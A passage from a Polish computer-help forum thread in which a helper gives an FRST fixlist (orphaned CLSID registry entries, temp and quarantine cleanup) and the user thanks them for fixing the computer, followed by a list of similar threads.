CustomCLSID: HKU\S-1-5-21-314960276-2723476446-2752971181-1001_Classes\CLSID\{071339A1-1946-44B2-B63E-50459B15DB86}\InprocServer32 -> axdb.dll => Brak pliku
CustomCLSID: HKU\S-1-5-21-314960276-2723476446-2752971181-1001_Classes\CLSID\{08A60FF7-BB37-44F4-9759-0ADA6C7B9CC9}\InprocServer32 -> axdb.dll => Brak pliku
CustomCLSID: HKU\S-1-5-21-314960276-2723476446-2752971181-1001_Classes\CLSID\{0B38CACA-3D3C-48EA-BEB5-7D95F4F6EE15}\InprocServer32 -> axdb.dll => Brak pliku
CustomCLSID: HKU\S-1-5-21-314960276-2723476446-2752971181-1001_Classes\CLSID\{0C3393F8-94F5-4B79-8C01-49A2D0CC0FE9}\InprocServer32 -> axdb.dll => Brak pliku
CustomCLSID: HKU\S-1-5-21-314960276-2723476446-2752971181-1001_Classes\CLSID\{0D555CE0-304A-47A6-858B-B145209A3982}\InprocServer32 -> axdb.dll => Brak pliku
CustomCLSID: HKU\S-1-5-21-314960276-2723476446-2752971181-1001_Classes\CLSID\{12545889-6D32-4424-9967-1E1D7BD1F809}\InprocServer32 -> axdb.dll => Brak pliku
CustomCLSID: HKU\S-1-5-21-314960276-2723476446-2752971181-1001_Classes\CLSID\{14679E3B-C952-4998-8E13-4B1286E6DD99}\InprocServer32 -> axdb.dll => Brak pliku
CustomCLSID: HKU\S-1-5-21-314960276-2723476446-2752971181-1001_Classes\CLSID\{1481B385-759A-4B00-9257-E96357563999}\InprocServer32 -> axdb.dll => Brak pliku
EmptyTemp:
Na klawiaturze naciśnij jednocześnie CTRL+S. W FRST kliknij na Fix (NAPRAW).


Potem kończymy:
Otwórz Notatnik i wklej w nim:

Cytat:DeleteQuarantine:
Plik zapisz pod nazwą fixlist.txt i umieść obok FRST. Uruchom FRST i kliknij w Fix (NAPRAW).
przez SHIFT+DEL usuń pozostały folder C:\FRST.
 System operacyjny: windows_seven Przeglądarka: seamonkey
#7
RE: [FRST] Prośba o analizę logów
WIELKIE dzięki za uleczenie komputera.
Wszystko śmiga aż miło.
Temat do zamknięcia.
 System operacyjny: windows_eight Przeglądarka: chrome
Programy: Polecane / Nowe / Inne




Podobne wątki ([FRST] Prośba o analizę logów)
Wątek: Autor Odpowiedzi: Wyświetleń: Ostatni post
  Prośba o sprawdzenie logów. bartosz777 3 578 01.05.2019, 11:13
Ostatni post: morderca
  Kłopot z pocztą, prośba o sprawdzenie logów filefox 1 607 27.04.2019, 08:05
Ostatni post: morderca
  Prośba, sprawdzenie logów Christianooo 8 950 11.04.2019, 18:44
Ostatni post: Christianooo

Skocz do:


Wybrane wątki ([FRST] Prośba o analizę logów)
Wątek: Autor Odpowiedzi: Wyświetleń: Ostatni post
  zamulony laptop - logi robert14-83 1 2437 12.11.2018 21:21
Ostatni post: morderca
  Komputer samoczynnie sie wyłącza i troche zamula. Vesiga 4 2374 03.11.2018 16:38
Ostatni post: Vesiga
  Yahoo, prośba o sprawdzenie logów Bobson1337 3 2641 08.10.2018 11:14
Ostatni post: morderca
  Prośba o sprawdzenie logów ricardo59 1 2569 08.09.2018 19:12
Ostatni post: morderca
  Komputer barrdzo zwolnił prace bardzo długo sie włącza Vesiga 1 3744 26.08.2018 07:51
Ostatni post: morderca
  Wolniejsza praca komputera oraz dziwne foldery w regedit. malcza 0 2699 25.08.2018 01:07
Ostatni post: malcza
  Problemy, problemy... Wolff 0 2838 30.07.2018 22:20
Ostatni post: Wolff
  Komputer bardzo zwalnia oraz uniemożliwia zapis na pulpicie 2real4game 2 2125 15.07.2018 01:01
Ostatni post: 2real4game
  Problem z autostartem oraz prośba o sprawdzenie logów mesti55 6 3182 12.07.2018 19:11
Ostatni post: mesti55
  rootkit -prośba o sprawdzenie logów ricardo59 4 2995 28.06.2018 08:53
Ostatni post: ricardo59
  prośba o sprawdzenie logów ricardo59 1 3188 23.06.2018 20:06
Ostatni post: morderca
  Prośba o sprawdzenie logów lukkii 1 2531 09.06.2018 08:27
Ostatni post: morderca
  Samoistne otwieranie niechcianych stron, Youtube nie działa GosiaczekGda 1 2809 08.06.2018 20:48
Ostatni post: morderca
  Zawieszenie systemu (logi) rogin 9 3387 27.05.2018 21:25
Ostatni post: morderca
  Sprawdzenie logów kasnia 2 2743 11.05.2018 20:14
Ostatni post: kasnia